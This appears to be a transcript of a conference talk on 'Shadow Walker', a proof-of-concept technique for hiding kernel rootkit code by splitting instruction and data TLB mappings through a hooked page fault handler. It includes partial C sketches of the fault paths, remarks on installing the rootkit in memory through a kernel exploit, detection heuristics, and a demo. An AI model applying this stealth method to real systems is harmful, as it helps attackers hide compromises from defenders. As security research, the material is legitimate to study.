In the ITLB load, what we do is replace the physical frame information in the PTE with the mapping for the physical frame that actually contains the rootkit code, because we want that to execute. We temporarily mark the PTE present to allow the memory access to go through, and we perform a call into the page, which loads up the ITLB. I should note here (I forgot to put this on the previous slide) that we do have to perform a call, which means we need to find an empty byte in our hidden page where we can insert a return opcode. In practice, if you're hiding sections in a driver, those are PE sections, so there's going to be some alignment, and therefore there's normally some empty space in there. You shouldn't really have trouble finding one byte that you can just patch a return into. So we make the call to that point in the page where the return has been patched, and it returns control back to the page fault handler; in the process, it loads up the ITLB. Finally, the PTE is marked non-present again, so we can catch subsequent accesses, and we replace the frame with the original, innocent-looking frame. Then we return back to the faulting application, or driver as the case may be, without passing the fault down to the OS. The OS doesn't need to have any knowledge of this page fault.

If it's a DTLB load, the steps are a little simpler, because by default we maintain the clean mapping in the PTE. So we just mark it present, perform a read access, mark it non-present again, and then, of course, return without passing it down to the OS.

All of this information so far concerns how you would hide executable code. We're running out of time, so I'm going to skip this section on data hiding; the slides should be available on rootkit.com within the next week or so. I'm going to move ahead, and we'll just talk a little about the rootkit here. The rootkit is, of course, the thing we're hiding with this technique. It's proof of concept; it doesn't really do anything malicious, it just hides processes. It runs as a system thread.
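(Pulling those steps together, here is a hedged sketch of the two fault paths just described, building on the HW_PTE and LoadItlb sketches above. The function names, parameters, and frame bookkeeping are our own illustration; the real handler also does the hash lookup and passes unrelated faults down to the OS, as described earlier.)

```c
/* Execute path: briefly expose the rootkit frame so the instruction
 * fetch caches it in the ITLB, then restore the innocent mapping. */
static void OnExecuteFault(HW_PTE *pte, uint32_t rootkitFrame,
                           uint32_t cleanFrame, void *retByteInPage)
{
    pte->PageFrameNumber = rootkitFrame;  /* point PTE at the real code     */
    pte->Valid = 1;                       /* let the fetch walk succeed     */

    LoadItlb(retByteInPage);              /* call into the page: caches     */
                                          /* VPN->rootkitFrame in ITLB only */

    pte->Valid = 0;                       /* re-arm to catch later accesses */
    pte->PageFrameNumber = cleanFrame;    /* PTE shows the innocent frame   */
    /* Return from the fault without invoking the OS handler; the faulting
     * instruction re-executes and now hits in the ITLB. */
}

/* Data path: the clean frame already sits in the PTE, so one read is
 * enough to cache VPN->cleanFrame in the DTLB. */
static void OnDataFault(volatile uint8_t *hiddenPage, HW_PTE *pte)
{
    pte->Valid = 1;
    (void)*hiddenPage;                    /* read access fills the DTLB     */
    pte->Valid = 0;
}
```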
It has no dependence upon userland initialization, which means it has no symbolic link and no functional device object in the driver. We also envision this rootkit as being an in-memory rootkit, meaning that ideally it would be installed via a kernel-level exploit. Obviously, if this rootkit driver has to live on the disk, we open up a whole new can of worms for detection and basically invalidate all these stealthy things that we're trying to do. So we never want it to reside on disk. That's a perfectly reasonable assumption if we consider attacking, say, a server system, which is infrequently rebooted: chances are high that this rootkit will sit in memory, and by the time we come back, it'll still be there.

Lastly, the impact on system performance: like we said, modern TLBs have high hit rates. That means most translations will be resolved via the TLB and not the page fault path, which means we take very little performance hit. I can't speak from a performance metrics point of view here, because we haven't done any rigorous performance testing, but I can say that, subjectively speaking, hiding Jamie's rootkit with the Shadow Walker memory hook engine, there is no noticeable performance impact. Clearly, the performance impact will vary depending upon the number of pages you're hiding. In this case, hiding a kernel driver, how many pages do you really have? You have four or five sections in a PE, a portable executable, so chances are you have only four or five pages. If they're page aligned, four or five pages is really negligible. So for small numbers of pages, we haven't observed any performance impact at all.

As this is not really a weaponized attack tool, there are a number of known limitations. Jamie and I have done this basically in our spare time, so we've not implemented a fully productized or weaponized version. First of all, there's no PAE support; PAE extends physical addressability from 32 to 36 bits, and we don't support that yet. There's no hyperthreading or multiprocessor support; there are clear synchronization problems involved in porting this to a multiprocessor system, and we've not addressed those yet. Currently, we only hide 4K-sized kernel pages. We are theoretically capable of hiding 4-megabyte pages; the x86 architecture actually has two page sizes, 4K and 4MB. The main point of interest with the 4-megabyte pages would be hiding the NT kernel, ntoskrnl, which sits on a 4-megabyte page, obviously of interest to a rootkit developer who wants to install his hooks into the operating system kernel. Currently, we can't hide ntoskrnl; there are some technical difficulties with that, which we're working to resolve. But it's quite effective for hiding drivers, including ones such as maybe NDIS drivers, which sit in the 4K page range. So we could hide things like hooks in the network drivers, for example.

As far as detection, I'm going to go over this real, real briefly; I think we're really running out of time here. First of all, like we said earlier, we had to impose the constraint that the memory we mark non-present is non-paged memory, so that we can differentiate our page faults from OS page faults. Obviously, non-present pages in non-paged memory are heuristically abnormal. Whether that's sufficient to indicate that a rootkit is installed is highly debatable, but it's still abnormal.
Obviously, the page fault handler code itself cannot be marked not-present, because that would imply marking the page containing the page fault handler as not-present, and we would end up with lots of problems with recursive re-entry. Therefore, for hiding the page fault handler itself, we have to fall back on more tried-and-true approaches. It's small, it's in assembly, and there are no APIs, so polymorphism seems like a fairly reasonable solution to that problem. Likewise, it's also difficult to conceal the hooks on the IDT. Currently, this proof of concept makes no effort to conceal the IDT hooks. Yes, this rootkit is very easily detected right now because of that, but that was not really our goal; we're just showing a proof of concept.

We're really running short on time, so I'm going to proceed to the demo and skip the last couple of slides. I know we're late, so if anyone has other engagements, feel free to head on out, but I am going to go ahead and perform the demo for anyone who's interested. I'm going to do a GUI version of this demo; I have a hardcore SoftICE version if anyone wants to see it after the talk.

The first thing I'm going to do: right now, I'm using Driver Monitor, a tool from the SoftICE driver suite that allows you to load a kernel driver. I'm going to go ahead and load up Jamie's rootkit, FU. So: go. Our driver has started successfully. Now, if we enter SoftICE, we can get the base address of where this driver is loaded in memory; this is the virtual address where the driver is loaded. We're going to go ahead and dump the memory at that address. For all of you who use hex dumps all the time, this should look pretty familiar: this 4D5A is simply the MZ signature at the start of the PE header. Right now, what we're seeing is the PE header of this rootkit driver loaded in memory. Now, at this point, I'm going to go ahead and load up Shadow Walker. It started up successfully. So now we're going to perform another memory dump. Well, now it's gone.

So, we'll take questions offline. We're leaving the room; we're being evicted. We have swag, books. We'd love to hear from you. Thanks a lot.